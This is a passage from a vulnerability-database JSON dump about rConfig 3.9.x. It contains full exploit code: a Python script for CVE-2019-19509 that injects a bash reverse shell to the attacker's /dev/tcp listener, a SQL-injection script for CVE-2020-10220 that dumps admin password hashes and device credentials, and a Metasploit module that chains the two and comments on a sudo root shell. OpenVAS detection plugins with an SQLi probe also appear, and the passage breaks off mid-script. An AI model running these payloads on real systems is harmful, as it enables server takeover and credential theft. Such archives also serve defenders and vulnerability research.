vikingfr \n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) \n# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh \n# Version: tested v3.9.3 \n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24 \n# \n# Notes : If you want to reproduce in your lab environment follow those links : \n# http://help.rconfig.com/gettingstarted/installation \n# then \n# http://help.rconfig.com/gettingstarted/postinstall \n# \n# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081 \n# rconfig - CVE-2019-19509 - Web authenticated RCE \n# [+] Logged in successfully, triggering the payload... \n# [+] Check your listener ! \n# ... \n# $ nc -nvlp 8081 \n# listening on [any] 8081 ... \n# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458 \n# bash: no job control in this shell \n# bash-4.2$ id \n# id \n# uid=48(apache) gid=48(apache) groups=48(apache) \n# bash-4.2$ \n \n#!/usr/bin/python3 \n \nimport requests \nimport sys \nimport urllib.parse \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \n \nprint (\"rconfig - CVE-2019-19509 - Web authenticated RCE\") \n \nif len(sys.argv) != 6: \nprint (\"[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort\") \nexit() \n \ntarget = sys.argv[1] \nusername = sys.argv[2] \npassword = sys.argv[3] \nip = sys.argv[4] \nport = sys.argv[5] \npayload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port) \n \nrequest = requests.session() \n \nlogin_info = { \n\"user\": username, \n\"pass\": password, \n\"sublogin\": 1 \n} \n \nlogin_request = request.post( \ntarget+\"/lib/crud/userprocess.php\", \nlogin_info, \nverify=False, \nallow_redirects=True \n) \n \ndashboard_request = request.get(target+\"/dashboard.php\", allow_redirects=False) \n \nif dashboard_request.status_code == 200: \nprint (\"[+] Logged in 
successfully, triggering the payload...\") \nencoded_request = target+\"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random\".format(urllib.parse.quote(payload)) \nprint (\"[+] Check your listener !\") \nexploit_req = request.get(encoded_request) \n \nelif dashboard_request.status_code == 302: \nprint (\"[-] Wrong credentials !\") \nexit() \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156146/rconfig393-exec.txt"}, {"lastseen": "2020-03-13T07:07:07", "description": "", "published": "2020-03-11T00:00:00", "type": "packetstorm", "title": "rConfig 3.9 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220"], "modified": "2020-03-11T00:00:00", "id": "PACKETSTORM:156688", "href": "https://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html", "sourceData": "`# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection \n# Exploit Author: vikingfr \n# Date: 2020-03-03 \n# CVE-2020-10220 \n# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py \n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) \n# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip \n# Install scripts : \n# https://www.rconfig.com/downloads/scripts/install_rConfig.sh \n# https://www.rconfig.com/downloads/scripts/centos7_install.sh \n# https://www.rconfig.com/downloads/scripts/centos6_install.sh \n# Version: tested v3.9.4 \n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24 \n# \n# Notes : If you want to reproduce in your lab environment follow those links : \n# http://help.rconfig.com/gettingstarted/installation \n# then \n# http://help.rconfig.com/gettingstarted/postinstall \n# \n# $ python3 rconfig_sqli.py https://1.1.1.1 \n# rconfig 3.9 - SQL Injection PoC \n# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php \n# [+] Extracting the current DB name 
: \n# rconfig2 \n# [+] Extracting 10 first users : \n# admin:1:63a9f0ea7bb98050796b649e85481845 \n# Maybe no more information ? \n# Maybe no more information ? \n# [snip] \n# [+] Extracting 10 first devices : \n# 127-0-0-1:127.0.0.1::ocdvulnpass: \n# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret \n# Maybe no more information ? \n# Maybe no more information ? \n# [snip] \n# Done \n \n \n#!/usr/bin/python3 \nimport requests \nimport sys \nimport urllib.parse \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \n \nprint (\"rconfig 3.9 - SQL Injection PoC\") \nif len(sys.argv) != 2: \nprint (\"[+] Usage : ./rconfig_exploit.py https://target\") \nexit() \n \nvuln_page=\"/commands.inc.php\" \nvuln_parameters=\"?searchOption=contains&searchField=vuln&search=search&searchColumn=command\" \ngiven_target = sys.argv[1] \ntarget = given_target \ntarget += vuln_page \ntarget += vuln_parameters \n \nrequest = requests.session() \ndashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False) \n \n \ndef extractDBinfos(myTarget=None,myPayload=None): \n\"\"\" \nExtract information from database \nArgs: \n- target+payload (String) \nReturns: \n- payload result (String) \n\"\"\" \nresult = \"\" \nencoded_request = myTarget+myPayload \nexploit_req = request.get(encoded_request) \nif '[PWN]' in str(exploit_req.content): \nresult = str(exploit_req.content).split('[PWN]')[1] \nelse: \nresult=\"Maybe no more information ?\" \n \nreturn result \n \n \nif dashboard_request.status_code != 404: \nprint (\"[+] Triggering the payloads on \"+given_target+vuln_page) \n# get the db name \nprint (\"[+] Extracting the current DB name :\") \ndb_payload = \"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--\" \ndb_name = extractDBinfos(target,db_payload) \nprint (db_name) \n# DB extract users \nprint 
(\"[+] Extracting 10 first users :\") \nfor i in range (0, 10): \nuser1_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".users+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\" \nuser_h = extractDBinfos(target,user1_payload) \n#print (\"[+] Dump device \"+str(i)) \nprint (user_h) \n# DB extract devices information \nprint (\"[+] Extracting 10 first devices :\") \nfor i in range (0, 10): \ndevice_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".nodes+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\" \ndevice_h = extractDBinfos(target,device_payload) \n#print (\"[+] Dump device \"+str(i)) \nprint (device_h) \n \nprint (\"Done\") \n \nelse: \nprint (\"[-] Please verify the URI\") \nexit() \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/156688/rconfig39-sql.txt"}], "openvas": [{"lastseen": "2020-01-16T15:15:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-19585", "CVE-2019-19509"], "description": "rConfig is prone to multiple vulnerabilities.", "modified": "2020-01-09T00:00:00", "published": "2020-01-09T00:00:00", "id": "OPENVAS:1361412562310113621", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113621", "type": "openvas", "title": "rConfig <= 3.9.3 Multiple Vulnerabilities", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# 
but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113621\");\n script_version(\"2020-01-09T09:49:23+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-09 09:49:23 +0000 (Thu, 09 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 09:38:07 +0000 (Thu, 09 Jan 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_cve_id(\"CVE-2019-19509\", \"CVE-2019-19585\");\n\n script_name(\"rConfig <= 3.9.3 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rconfig_detect.nasl\");\n script_mandatory_keys(\"rconfig/detected\");\n\n script_tag(name:\"summary\", value:\"rConfig is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - A remote authenticated user can directly execute system commands by sending a GET request\n to ajaxArchiveFiles.php because the path parameter is passed to the exec function without filtering.\n\n - The install script updates the /etc/sudoers file for rConfig specific tasks. 
After an\n rConfig specific Apache configuration update, Apache has high privileges for some binaries.\n This can be exploited by an attacker to bypass local security restrictions.\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an authenticated attacker to gain complete\n control over the target system.\");\n script_tag(name:\"affected\", value:\"rConfig through version 3.9.3.\");\n script_tag(name:\"solution\", value:\"No known solution is available as of 09th January, 2020.\n Information regarding this issue will be updated once solution details are available.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_lpe.sh\");\n script_xref(name:\"URL\", value:\"https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:rconfig:rconfig\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! 
infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less_equal( version: version, test_version: \"3.9.3\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"None\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T15:40:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-10220"], "description": "rConfig is prone to an SQL injection (SQLi) vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2020-03-09T00:00:00", "id": "OPENVAS:1361412562310113651", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113651", "type": "openvas", "title": "rConfig <= 3.9.4 SQLi Vulnerability", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113651\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-09 14:56:57 +0200 (Mon, 09 Mar 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_cve_id(\"CVE-2020-10220\");\n\n script_name(\"rConfig <= 3.9.4 SQLi Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rconfig_detect.nasl\");\n script_mandatory_keys(\"rconfig/detected\");\n\n script_tag(name:\"summary\", value:\"rConfig is prone to an SQL injection (SQLi) vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to execute an SQL query on the target system.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability is exploitable via the searchColumn parameter in commands.inc.php.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to read sensitive information\n and execute arbitrary code on the target machine.\");\n\n script_tag(name:\"affected\", value:\"rConfig through version 3.9.4.\");\n\n script_tag(name:\"solution\", value:\"No known solution is available as of 09th March, 2020.\n Information regarding this issue will be updated once solution details are available.\");\n\n script_xref(name:\"URL\", 
value:\"https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_sqli.py\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:rconfig:rconfig\";\n\ninclude( \"host_details.inc\" );\ninclude( \"misc_func.inc\" );\ninclude( \"http_func.inc\" );\ninclude( \"http_keepalive.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) )\n exit( 0 );\n\nif( ! location = get_app_location( cpe: CPE, port: port ) )\n exit( 0 );\n\nif( location == \"/\" )\n location = \"\";\n\nvt_strings = get_vt_strings();\n\nattack_url = location + \"/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%200x\" + toupper( vt_strings[\"default_rand_hex\"] ) + \",NULL--\";\nreq = http_get( port: port, item: attack_url );\nres = http_keepalive_send_recv( port: port, data: req, bodyonly: FALSE );\n\nif( res =~ 'id=\"' + vt_strings[\"default_rand\"] + '\"' ) {\n report = 'It was possible to execute an SQL command.\\n';\n report += http_report_vuln_url( port: port, url: attack_url );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-20T15:43:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-10221", "CVE-2020-10220"], "description": "rConfig is prone to multiple vulnerabilities.", "modified": "2020-05-19T00:00:00", "published": "2020-03-10T00:00:00", "id": "OPENVAS:1361412562310113649", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113649", "type": "openvas", "title": "rConfig < 3.9.5 Multiple Vulnerabilities", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that 
it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113649\");\n script_version(\"2020-05-19T04:50:37+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-19 04:50:37 +0000 (Tue, 19 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-10 10:14:38 +0000 (Tue, 10 Mar 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2020-10220\", \"CVE-2020-10221\");\n\n script_name(\"rConfig < 3.9.5 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rconfig_detect.nasl\");\n script_mandatory_keys(\"rconfig/detected\");\n\n script_tag(name:\"summary\", value:\"rConfig is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - The web interface is prone to an SQL injection via\n the searchColumn parameter of the commands.inc.php page.\n\n - lib/ajaxHandlers/ajaxAddTemplate.php allows remote attackers\n to execute arbitrary OS commands via shell metacharacters\n in the fileName POST parameter.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to\n gain 
complete control over the target system.\");\n\n script_tag(name:\"affected\", value:\"rConfig through version 3.9.4.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.9.5 or later.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_sqli.py\");\n script_xref(name:\"URL\", value:\"https://engindemirbilek.github.io/rconfig-3.93-rce\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:rconfig:rconfig\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less_equal( version: version, test_version: \"3.9.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.9.5\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2020-03-17T13:43:10", "description": "", "published": "2020-03-17T00:00:00", "type": "exploitdb", "title": "Rconfig 3.x - Chained Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220", "CVE-2019-19509"], "modified": "2020-03-17T00:00:00", "id": "EDB-ID:48223", "href": "https://www.exploit-db.com/exploits/48223", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Rconfig 3.x Chained Remote Code Execution',\r\n 'Description' => '\r\n This module exploits multiple vulnerabilities in rConfig version 3.9\r\n in order to execute 
arbitrary commands.\r\n This module takes advantage of a command injection vulnerability in the\r\n `path` parameter of the ajax archive file functionality within the rConfig web\r\n interface in order to execute the payload.\r\n Valid credentials for a user with administrative privileges are required.\r\n However, this module can bypass authentication via SQLI.\r\n This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.\r\n The steps are:\r\n 1. SQLi on /commands.inc.php allows us to add an administrative user.\r\n 2. An authenticated session is established with the newly added user\r\n 3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to\r\n execute the payload.\r\n 4. Remove the added admin user.\r\n Tips : once you get a shell, look at the CVE-2019-19585.\r\n You will probably get root because rConfig install script add Apache user to\r\n sudoers with nopasswd ;-)\r\n ',\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module\r\n 'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/)\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2019-19509'], # authenticated rce\r\n ['CVE', '2020-10220'], # sqli auth bypass\r\n %w[EDB 47982],\r\n %w[EDB 48208],\r\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE\r\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi\r\n ],\r\n 'Platform' => %w[unix linux],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [['Auto', {}]],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => '2020-03-11',\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects\r\n 'PAYLOAD' => 'generic/shell_reverse_tcp'\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n 
OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])\r\n ]\r\n end\r\n\r\n # CHECK IF RCONFIG IS REACHABLE AND INSTALLED\r\n def check\r\n vprint_status 'STEP 0: Get rConfig version...'\r\n res = send_request_cgi!(\r\n 'method' => 'GET',\r\n 'uri' => '/login.php'\r\n )\r\n if !res || !res.get_html_document\r\n fail_with(Failure::Unknown, 'Could not check rConfig version')\r\n end\r\n if res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig Version 3.9'\r\n print_good('rConfig version 3.9 detected')\r\n return Exploit::CheckCode::Appears\r\n elsif res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig'\r\n print_status('rConfig detected, but not version 3.9')\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n\r\n # CREATE AN ADMIN USER IN RCONFIG\r\n def create_rconfig_user(user, _password)\r\n vprint_status 'STEP 1 : Adding a temporary admin user...'\r\n fake_id = Rex::Text.rand_text_numeric(3)\r\n fake_pass = Rex::Text.rand_text_alpha(10)\r\n fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin'\r\n fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'\r\n userleveladmin = 9 # Administrator\r\n user_sqli = \"command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--\"\r\n sqli_res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\r\n 'method' => 'GET',\r\n 'vars_get' => {\r\n 'search' => 'search',\r\n 'searchOption' => 'contains',\r\n 'searchField' => 'vuln',\r\n 'searchColumn' => user_sqli\r\n }\r\n )\r\n unless sqli_res\r\n print_warning('Failed to create user: Connection failed.')\r\n return\r\n end\r\n print_good \"New temporary user #{user} created\"\r\n end\r\n\r\n # AUTHENTICATE ON RCONFIG\r\n def login(user, pass)\r\n vprint_status \"STEP 2: Authenticating as 
#{user} ...\"\r\n # get session cookie (PHPSESSID)\r\n res = send_request_cgi!(\r\n 'method' => 'GET',\r\n 'uri' => '/login.php'\r\n )\r\n @cookie = res.get_cookies\r\n if @cookie.empty?\r\n fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'\r\n return\r\n end\r\n # authenticate\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),\r\n 'cookie' => @cookie,\r\n 'vars_post' => {\r\n pass: pass,\r\n user: user,\r\n sublogin: 1\r\n }\r\n )\r\n unless res\r\n print_warning('Failed to authenticate: Connection failed.')\r\n return\r\n end\r\n print_good \"Authenticated as user #{user}\"\r\n end\r\n\r\n def trigger_rce(cmd, _opts = {})\r\n vprint_status \"STEP 3: Executing the command (#{cmd})\"\r\n trigger = \"`#{cmd} #`\"\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'),\r\n 'cookie' => @cookie,\r\n 'vars_get' => {\r\n 'path' => trigger,\r\n 'ext' => 'random'\r\n }\r\n )\r\n # the page hangs because of the command being executed, so we can't expect HTTP response\r\n # unless res\r\n # fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed'\r\n # return\r\n # end\r\n # unless res.body.include? 
'\"success\":true'\r\n # fail_with Failure::Unknown, 'It seems that the code was not executed'\r\n # return\r\n # end\r\n print_good 'Command sucessfully executed'\r\n end\r\n\r\n # DELETE A USER\r\n def delete_rconfig_user(user)\r\n vprint_status 'STEP 4 : Removing the temporary admin user...'\r\n del_sqli = \"command ; DELETE FROM `users` WHERE `username`='#{user}';--\"\r\n del_res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\r\n 'method' => 'GET',\r\n 'vars_get' => {\r\n 'search' => 'search',\r\n 'searchOption' => 'contains',\r\n 'searchField' => 'vuln',\r\n 'searchColumn' => del_sqli\r\n }\r\n )\r\n unless del_res\r\n print_warning \"Removing user #{user} failed: Connection failed. Please remove it manually.\"\r\n return\r\n end\r\n print_status \"User #{user} removed successfully !\"\r\n end\r\n\r\n def cleanup\r\n super\r\n delete_rconfig_user @username if @username\r\n end\r\n\r\n def exploit\r\n check\r\n @username = rand_text_alphanumeric(8..12)\r\n @password = 'admin'\r\n create_res = create_rconfig_user @username, @password\r\n login(@username, @password)\r\n tmp_txt_file = Rex::Text.rand_text_alpha(10)\r\n tmp_zip_file = Rex::Text.rand_text_alpha(10)\r\n # The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). 
Too bad :-(\r\n # trigger_rce(\"touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'\")\r\n trigger_rce(payload.encoded.to_s)\r\n end\r\nend", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48223"}, {"lastseen": "2020-03-12T13:37:19", "description": "", "published": "2020-03-12T00:00:00", "type": "exploitdb", "title": "rConfig 3.9 - 'searchColumn' SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220"], "modified": "2020-03-12T00:00:00", "id": "EDB-ID:48208", "href": "https://www.exploit-db.com/exploits/48208", "sourceData": "# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection\r\n# Exploit Author: vikingfr\r\n# Date: 2020-03-03\r\n# CVE-2020-10220\r\n# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py\r\n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)\r\n# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip\r\n# Install scripts : \r\n# https://www.rconfig.com/downloads/scripts/install_rConfig.sh\r\n# https://www.rconfig.com/downloads/scripts/centos7_install.sh\r\n# https://www.rconfig.com/downloads/scripts/centos6_install.sh\r\n# Version: tested v3.9.4\r\n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24\r\n#\r\n# Notes : If you want to reproduce in your lab environment follow those links :\r\n# http://help.rconfig.com/gettingstarted/installation\r\n# then\r\n# http://help.rconfig.com/gettingstarted/postinstall\r\n#\r\n# $ python3 rconfig_sqli.py https://1.1.1.1\r\n# rconfig 3.9 - SQL Injection PoC\r\n# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php\r\n# [+] Extracting the current DB name :\r\n# rconfig2\r\n# [+] Extracting 10 first users :\r\n# admin:1:63a9f0ea7bb98050796b649e85481845\r\n# Maybe no more 
information ?\r\n# Maybe no more information ?\r\n# [snip]\r\n# [+] Extracting 10 first devices :\r\n# 127-0-0-1:127.0.0.1::ocdvulnpass:\r\n# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret\r\n# Maybe no more information ?\r\n# Maybe no more information ?\r\n# [snip]\r\n# Done\r\n \r\n\r\n#!/usr/bin/python3\r\nimport requests\r\nimport sys\r\nimport urllib.parse\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\nprint (\"rconfig 3.9 - SQL Injection PoC\")\r\nif len(sys.argv) != 2:\r\n print (\"[+] Usage : ./rconfig_exploit.py https://target\")\r\n exit()\r\n\r\nvuln_page=\"/commands.inc.php\"\r\nvuln_parameters=\"?searchOption=contains&searchField=vuln&search=search&searchColumn=command\"\r\ngiven_target = sys.argv[1]\r\ntarget = given_target\r\ntarget += vuln_page\r\ntarget += vuln_parameters\r\n\r\nrequest = requests.session()\r\ndashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)\r\n\r\n\r\ndef extractDBinfos(myTarget=None,myPayload=None):\r\n\t\"\"\"\r\n\tExtract information from database\r\n\tArgs:\r\n\t\t- target+payload 